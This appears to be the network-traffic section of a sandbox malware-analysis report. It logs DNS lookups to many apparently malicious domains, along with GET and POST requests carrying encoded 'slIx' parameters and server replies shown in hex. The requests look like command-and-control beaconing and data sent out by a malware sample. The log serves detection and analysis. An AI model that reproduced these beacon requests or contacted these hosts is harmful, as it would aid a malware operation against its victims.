                Source: global trafficHTTP traffic detected: GET /eojo/?slIx=Yz7YuOaeaKTXEoSJDY2yImq5Ku8i4tf6uM4XxXFlfNcKEEB1WieW1s7C74dLI/78n4Op9cMjhBcg8poKJa0nG+xDD3uhBffmgU1IIJhomkx/NmGp91JN0qV/wLs3yqkw0w==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.tieniu09.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /cww8/?slIx=Hmoz+IfPiJXqsDkfcZheS931ZSxwCJ7VIU5cbISIHOjUw5YyfsyVAgta8cFSmb5sqAeDxag2rezUODD2jYM3ZLYiDQjvobokOP7MGZf0B+2w6MAIN+jqVRA9ROwqqZyHLA==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.powink.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /myyp/?slIx=IAWqTuecY9hdi9ITfTxvc93vrJvyfa0UJtA/9EirFhaonclXAeJZmglSZwF77PpMTTkfNEvSaIZzezSVzdwiOZd+8ASqNzkjkVIV/evJQi82A7OLRPUJ4/Gv6mcs0BI7Og==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.cryptoannounce.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /gj6l/?slIx=N2iGAYmiHmz3P78MfBdIf93yp0m6B2TWolq7SLNBtE8HJr9F2XkfgbE8gyjLFEE5jgd8Z+KCreOkBw58fV95kmvr4GsjxChf0zNglAV5rfDQZVtGNsE3epRVpk8YHwXQhw==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.auradesigns.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /89c4/?slIx=wBkD3DpQC+rVZys6575un3uKDFb57jq2XJre9qWCgdYCGMZtAvpAapTHqskmMNUASTI9dfgCIWJcYqOj5ZqLzo0eC6qgb2QXMP9rejJq5qo6d5ReDPmFhq29Etu0w2THcw==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.banayad.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /0by2/?Fd=GFVtMVdh-dnDd&slIx=Xkvyqp+XZLKZU589TKRz7G6wpBuaXd0vN6gjsxC0kkeXdHL11jMVdUY60z58AKK0JzCQFYYyiKoBtZI4Oma89bfmIAUiHCvCZ4a4/Cs8RjaSheXxzQX3fo1AsGwPUZxaxw== HTTP/1.1Host: www.full4movies.christmasAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /k9pr/?slIx=CDjwd1278zRANLF/sEY9fJbPC8zv0vqgxekCbIi7tj8c6MZStqcPWBHCoaRzgvjcHIn6Jc0FPThjVKVRXrswGP9iTMxQHkJJQcTwoq/shhUN6VTKMYd8ewFUe2SraFEsrQ==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.ekstrak.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /c8yp/?Fd=GFVtMVdh-dnDd&slIx=b5CBE9dIYbE1w3ILmal/bIw6nRDsTE+DiblhBZgQsnWE1T+JYBMB2OYZS4GcvRGWQ07+DGcJB07WbaBe/hN0eqn6XRyRbYCG5Cpi5QrfSTkzcTTWi3NmxuTzbtLkAUUL3g== HTTP/1.1Host: www.stuhlmann.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficDNS traffic detected: DNS query: www.economia.uol.com.br
                Source: global trafficDNS traffic detected: DNS query: www.venturegioballng.fun
                Source: global trafficDNS traffic detected: DNS query: www.6644win.mom
                Source: global trafficDNS traffic detected: DNS query: www.curiosa.news
                Source: global trafficDNS traffic detected: DNS query: www.globedesign.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tieniu09.xyz
                Source: global trafficDNS traffic detected: DNS query: www.powink.site
                Source: global trafficDNS traffic detected: DNS query: www.cryptoannounce.xyz
                Source: global trafficDNS traffic detected: DNS query: www.x56uasf728r.shop
                Source: global trafficDNS traffic detected: DNS query: www.auradesigns.xyz
                Source: global trafficDNS traffic detected: DNS query: www.object-58974.shop
                Source: global trafficDNS traffic detected: DNS query: www.banayad.xyz
                Source: global trafficDNS traffic detected: DNS query: www.full4movies.christmas
                Source: global trafficDNS traffic detected: DNS query: www.ekstrak.xyz
                Source: global trafficDNS traffic detected: DNS query: www.stuhlmann.cloud
                Source: unknownHTTP traffic detected: POST /gg0c/ HTTP/1.1Host: www.venturegioballng.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Origin: http://www.venturegioballng.funReferer: http://www.venturegioballng.fun/gg0c/Connection: closeCache-Control: no-cacheContent-Length: 205Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)Data Raw: 73 6c 49 78 3d 74 32 6f 7a 34 4d 41 73 68 43 4c 65 58 61 4c 43 6b 63 62 7a 4c 43 58 44 56 6b 59 79 67 53 52 55 7a 77 48 73 71 73 4e 53 6e 53 2f 6e 67 75 4e 65 6e 4f 78 58 61 43 38 72 61 55 34 66 70 59 55 4a 74 68 5a 47 58 47 63 44 56 72 50 58 4d 70 48 30 62 43 64 4f 71 56 76 31 50 49 39 4a 4f 2b 37 6b 72 59 6b 51 7a 75 79 71 6c 35 72 63 2b 48 57 42 35 77 65 66 66 37 65 64 69 68 50 37 39 42 61 44 71 39 57 6b 75 70 36 48 6a 58 75 5a 50 4b 56 57 69 6b 6b 73 49 73 77 62 34 37 53 39 42 70 39 71 75 32 4e 49 52 64 78 6b 67 32 54 69 54 65 79 4d 48 65 32 73 2b 50 75 66 54 65 74 38 5a 51 66 49 77 71 66 51 7a 48 55 3d Data Ascii: slIx=t2oz4MAshCLeXaLCkcbzLCXDVkYygSRUzwHsqsNSnS/nguNenOxXaC8raU4fpYUJthZGXGcDVrPXMpH0bCdOqVv1PI9JO+7krYkQzuyql5rc+HWB5weff7edihP79BaDq9Wkup6HjXuZPKVWikksIswb47S9Bp9qu2NIRdxkg2TiTeyMHe2s+PufTet8ZQfIwqfQzHU=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:30:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPt7iAJF1oDqqJHouP9iAxBKrPpMeQZCUy5crx4Z5SBlYvkmcW6rcgc2HeIpk%2BZMmJO0wKxJ5qgDCAoOg%2FUFBBzH1dvzxkJERyZ1ds6UQQVCmBzcIrsv7xHs9eKdJSoTwWM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c23d9b96932e7-JAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=113347&min_rtt=113347&rtt_var=56673&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:30:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgfbw6X8gWI7XJrGJPVNyGsQNehYNkCI4fh2ekCjbnNBhOV9aYUTMLsJsQq52sKk%2BPiC8AwDzdK9GeruazMxHV3VA9Jvd6aCmax3ypitnTgw2uwHXJ9wPBEsnwX6m2F6jJg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c23ea5ef21e3d-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119932&min_rtt=119932&rtt_var=59966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=780&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:30:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fl1mOOeN6XJHL%2Fga5xwdKcmGMaos2IbVL9JzsIGZCO4UCIriV3%2BJZ8DPzddFQPPEKE8M0LBvo%2BU7klxHRrtkEC5GOiU6Pe5Ok3kqSVujo5vF%2F1M%2FKldCfIp%2BBjHuBUehXLo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c23fb2ee12733-JAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=117932&min_rtt=117932&rtt_var=58966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=940&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:30:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88xmGklSc92hYvNEW7mLq0xBB%2BvAMhoGGQcAFPEwlcsrxiUX%2BiI4pdBGA%2FbdZ15QePjkvns%2FjZMI%2BZ1rOM4jduma6KUWuWKaDrw9pM9PWs9bK%2Bmr%2FonpokNGbajRQjYA0ac%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c240bbbb44954-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121090&min_rtt=121090&rtt_var=60545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=507&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPTcFsKjh0adG51YbaFuJmqN%2BcdS6OdFNSV%2FPUr9hvw1d8XaCDRhpL13f1sWbk%2BDUg8bJUx%2B0JxAagQqdFtICcum7EsCt24G0LSQWy7KrE7PrVK%2FazEdG6tnZD%2FK9E8yCefb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c24e30dd4b7f2-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119959&min_rtt=119959&rtt_var=59979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=763&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 2b c9 4c cd cb 2c 35 b0 d4 ab a8 ac 52 b2 d1 87 ea 04 00 00 00 ff ff 03 00 cc ec ea 0c 42 00 00 00 0d 0a Data Ascii: 57)N.,(+K/ON,(JMSUP())(///+L,5RB
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYH9Vh1oQ9E2Ow%2FbBla9Hm1AtaajW0zKDsweos%2B2ytyibIF%2FXAH20fX2k4CUGUOAd%2FxleOyl3FVsNbU5AwJ5V%2BPx5FuUIYCCKgbR%2FfB0GWrute9xtXu0Oqe3fRgif%2FVrmhN1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c24f3ad1a1277-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119591&min_rtt=119591&rtt_var=59795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 2b c9 4c cd cb 2c 35 b0 d4 ab a8 ac 52 b2 d1 87 ea 04 00 00 00 ff ff 03 00 cc ec ea 0c 42 00 00 00 0d 0a Data Ascii: 57)N.,(+K/ON,(JMSUP())(///+L,5RB
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7kZEOCW0CwyKD0tuqSwcg51s9jvK9uUXXuN3gjwLtgo7MiE9x152%2BeRCz3Yb28wLDeIXzsAVg85J%2B1yhLyB6qEg%2BjdhDrapgIFwz5MSj8akOBbuP9ocjhAnAu4gU%2BlQsxpfW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c25045e2c3d59-JAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120064&min_rtt=120064&rtt_var=60032&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=943&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 2b c9 4c cd cb 2c 35 b0 d4 ab a8 ac 52 b2 d1 87 ea 04 00 00 00 ff ff 03 00 cc ec ea 0c 42 00 00 00 0d 0a Data Ascii: 57)N.,(+K/ON,(JMSUP())(///+L,5RB
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B06VlEOTP0u99m2%2FPUmLOM%2FpWdfIx4cRBrrONr5Cg8b%2F95qeJtxekzQzDQZWG7X%2F9Xeplzs8z84GFuhFWEimYnOMi8N%2BS6cLg9tfTEwpyCW%2Fzo0PlluKUVVar2pjVL3CSxiL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c2514ed8e32e9-JAXalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114654&min_rtt=114654&rtt_var=57327&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=508&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 32 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 69 65 6e 69 75 30 39 2e 78 79 7a 22 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 42<script>window.location.href = "https://www.tieniu09.xyz"</script>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 14:31:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
